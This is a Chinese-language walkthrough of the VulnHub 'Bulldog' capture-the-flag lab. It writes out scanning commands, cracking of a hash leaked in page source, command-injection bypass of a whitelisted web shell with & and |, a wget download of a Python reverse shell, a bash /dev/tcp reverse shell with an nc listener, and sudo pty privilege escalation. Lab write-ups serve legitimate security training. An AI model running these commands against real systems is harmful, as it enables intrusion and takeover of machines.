靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova
一、主机发现
netdiscover -i eth0 -r 192.168.10.0/24
二、端口扫描
masscan --rate=10000 -p0-65535 192.168.10.154
三、服务识别
nmap -sV 192.168.10.154 -p23,8080,80
四、发现服务漏洞并利用
1.浏览器访问http://192.168.10.152
2.目录扫描
3.发现http://192.168.10.154/admin/login,尝试弱口令登录,失败
4.发现http://192.168.10.154/dev/,然后访问,查看页面源码,可以看到注释有MD5的字符串,尝试解密,解密出来bulldog bulldoglover
5.尝试使用邮箱用户名登录,失败,尝试用邮箱的开头,成功登录
6.发现http://192.168.10.154/dev/shell/ 访问
5.1发现可能存在命令执行漏洞,尝试输入一些系统命令,发现对命令做了白名单限制,只允许给出的命令
尝试使用;执行多个命令,“;”被过滤失败,尝试使用&,&&,|等方式执行多个命令,成功
5.2经过尝试,存在命令执行漏洞
5.3之前服务识别发现web使用python搭建的,可以利用wget 远程下载一个python反弹shell到目标服务器上,然后利用命令执行漏洞执行上传到服务器的python脚本
5.3.1在远程主机上搭建一个web站点,把python反弹shell脚本放入
或者使用echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash 反弹shell
python -m SimpleHTTPServer 80 开启web服务
5.3.2在目标上执行ls|wget http://192.168.10.153/shell.py,远程下载python 反弹shell脚本,
查看是否下载成功
5.3.3在远程主机上开启监听 nc -nvlp 4444
5.3.4在目标上执行ls&python fantan.py,此时供给端已经成功得到目标的shell
5.3.5连接到目标的shell之后, 发现当前用户属于sudo组,尝试切换账户失败,需要终端
5.3.5切换到家目录发现有个类似管理员的目录,找到密码
或者查找每个用户的文件(不显示错误)find / -user bulldogadmin 2>/dev/null
使用 strings打印其中的可打印字符,发现密码
5.3.7连接到目标的shell,但是没有反弹一个终端到攻击端, 此时需要新建一个终端,拿到管理员权限
python -c 'import pty;pty.spawn("/bin/bash")'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
注:先用python 开启一个终端,报错,然后用sudo python 开启一个终端,达到提权的目的
总结:
1.信息收集
2.页面源码信息泄露
3.dirb爆破目录
4.命令执行,反弹shell,提权
![[漏洞复现] [Vulhub靶机] Struts2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)](https://www.kunjuke.com/file/css/thumb/10.jpg/280-180.jpg)
